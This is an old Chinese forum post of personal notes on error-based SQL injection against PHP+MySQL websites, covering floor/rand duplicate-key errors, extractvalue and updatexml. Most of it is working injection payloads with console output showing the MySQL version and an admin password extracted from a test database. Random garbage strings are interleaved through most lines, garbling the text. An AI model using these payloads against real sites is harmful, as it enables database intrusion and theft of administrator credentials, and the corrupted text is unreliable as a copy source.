放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。! l7 o' i% T' T. O$ F
实际测试环境:
4 P- B9 K& F0 r* Z% p( R& F6 b$ r
+ I3 X( m. n( U w & W. X/ k) D3 P2 A
mysql> show tables;
, {( ?! E, k4 W4 \8 j! G3 Q+----------------+
& U5 C- ?1 L8 ~' i| Tables_in_test |! }2 S! J4 |- v: k) x' M! G M1 V) L
+----------------+" v( Z2 w, l4 u( W
| admin |
/ k- f" Q6 C7 z& @# D9 M| article |
8 t7 C; o7 \) _4 u f7 {1 J+----------------+9 @3 S, f0 A4 Q4 _& W& c) Y
9 ?$ x$ n" S$ W: O" T
* h# F# D$ e* ^( y1 x# j3 h
0 U/ C/ G3 U; T% \
mysql> describe admin;
# Z. A0 Z7 J0 V, _# l) ^% g+-------+------------------+------+-----+---------+----------------+; r* G; Q' D, s$ ^ E
| Field | Type | Null | Key | Default | Extra |
: ~. `( Z* ?9 I" H% g+-------+------------------+------+-----+---------+----------------+
6 B4 X0 ]9 [; L8 S7 `" c| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
, [) g: M( P5 {! t( m$ H6 R| user | varchar(50) | NO | | NULL | |
7 r" r* s* _" y! Z5 z9 f| pass | varchar(50) | NO | | NULL | |
" n; \( |) Z; b: J+-------+------------------+------+-----+---------+----------------+1 J0 O/ W2 s5 z; _/ n
4 e" [7 L; P6 K" @: R' ^
3 Q* M1 p# P* |% R' e' ^- n
3 ] ]0 U( W. jmysql> describe article;6 d# [# t$ d7 h8 O* `
+---------+------------------+------+-----+---------+----------------+
% l4 u& v) H F) D) s% R" O| Field | Type | Null | Key | Default | Extra |- i) _$ z `& K. k5 j5 E
+---------+------------------+------+-----+---------+----------------+: B( T" W* y1 E! D' l0 Q; J1 F$ l
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |! J/ B/ ^0 f) p% M6 g( K
| title | varchar(50) | NO | | NULL | |8 T7 J: [+ h7 m9 P. |" y# G1 ]
| content | varchar(50) | NO | | NULL | |5 O5 D3 k5 B0 l {7 {
+---------+------------------+------+-----+---------+----------------+9 | |! d& @8 A+ f
1、通过floor报错
( T1 M: o1 r. t可以通过如下一些利用代码
8 z3 @1 w9 [: h u1 ^9 V& T
. r( U# A/ p @1 K K 6 | F$ @& A9 N5 t
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x5 }( T9 ?9 X8 X9 B/ q1 `% c
from information_schema.tables group by x)a);
) {" |! b1 g( o. T
h8 V1 h, D7 p7 t6 h
9 V+ s' v' C9 \8 z6 Y% Qand (select count(*) from (select 1 union select null union select !1)x: ^9 `' e. T, i2 h! B! a3 A" x$ ]# |
group by concat((select table_name from information_schema.tables limit 1),. S5 `) b' w8 S2 d8 d! J
floor(rand(0)*2)));# x) A8 H8 J5 w0 |' P
举例如下:+ h$ C [6 Y/ e+ }4 k$ ]8 i
首先进行正常查询:
; ?% M. F+ h* d2 K0 A6 a 5 S3 E3 Y7 P2 r, j7 p3 P" z; L
mysql> select * from article where id = 1;6 Z/ |1 b* l e9 `5 X, z
+----+-------+---------+2 j7 D* _6 |/ E4 ~( y5 ~
| id | title | content |* k& K6 t& T9 J: E! s: o' h# \
+----+-------+---------+
7 N# N/ f! T& n$ S ?6 C| 1 | test | do it |
0 W1 w. P+ H4 i) g( r2 s' Q- T+----+-------+---------+
3 t- Z" a1 R$ y8 p. o9 E0 r假如id输入存在注入的话,可以通过如下语句进行报错。
! ^+ ^/ I" r6 }; u" C1 j6 _9 n, } 7 T, f- ~9 L" J( z& C$ X
& n* {- F8 K0 g. m5 F5 Z+ W
mysql> select * from article where id = 1 and (select 1 from
5 d5 u1 \ @3 v/ D1 x( z(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);9 _$ H& q( R' w
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'2 c3 e5 H6 S) _, h! _$ O8 |0 E
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。7 ?1 G1 K- S/ d, t# S" k
例如我们需要查询管理员用户名和密码: o" I! @" Z- \! q: p' Z
Method1:
# D" Y+ a; Q. I+ Z$ C
2 F" l. n; l' N, l ! H' u7 G: o# _/ D( ] f& [3 e
mysql> select * from article where id = 1 and (select 1 from: o8 C8 B8 K* c/ R
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
, [6 J$ t. m. R, @4 w, ?from information_schema.tables group by x)a);, |: V6 C' [7 D0 V- P! k5 s
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'4 o( j3 C( w) G; u
Method2:$ F! v8 }, V, x* M) {( w j2 I! L) O
7 N- h* x* B, L
/ e2 H2 a# p* Q. ~/ i2 v7 ]) g
mysql> select * from article where id = 1 and (select count(*)- |; G& N7 t6 A" C+ @
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),. _9 n9 X+ T/ c9 t$ I+ N
floor(rand(0)*2)));/ a4 U! n) |7 E, f$ u5 p
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
, B q* W2 H1 M; r2 Y2、ExtractValue: H% ?# K% K* e: {( _2 b
测试语句如下) p' d: y! X1 |+ Q* u0 S5 H
3 j b0 T% d# j0 Q; Z
4 b4 I* T& w( |: D2 t1 y9 @and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));3 s% ?* E' d+ {3 |! e, D+ u
实际测试过程* X# L3 t) M- Q9 D8 x' x" o
5 H" \- d8 q0 a s/ M
6 w0 }( L ?9 k9 @# x
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,7 m v4 w: p) }
(select pass from admin limit 1)));--/ O0 D* [% B; f
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
2 h" m! ~) K& n# ~% V$ G Z9 C! h3、UpdateXml3 n* n, R4 l9 f4 n0 `
测试语句
0 |) r4 V+ ^; l; n7 ?- ~/ J) Y ! Y/ b& n7 [. ~
& B9 l3 t& N9 a# R, ^
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
9 g/ V9 s" W, c实际测试过程
- c0 N. c+ k% r* X) p
! r% ?' l; k, Z" u! P
* f0 \* ~& A+ C* [# ~- n+ wmysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,! R+ O7 k$ `! y* e8 h
(select pass from admin limit 1),0x5e24),1));
! S3 q1 f% P: l9 X2 \+ F$ i4 XERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'& r* _6 b+ e& W
All, thanks foreign guys.( l6 f) o9 l& B1 \; y
L, P- t7 ^. Q# m; }" S
5 i. m* Y3 X2 S: @, O- V% E5 E* c
|
发表于 2012-12-10 10:28:51
收藏
支持
反对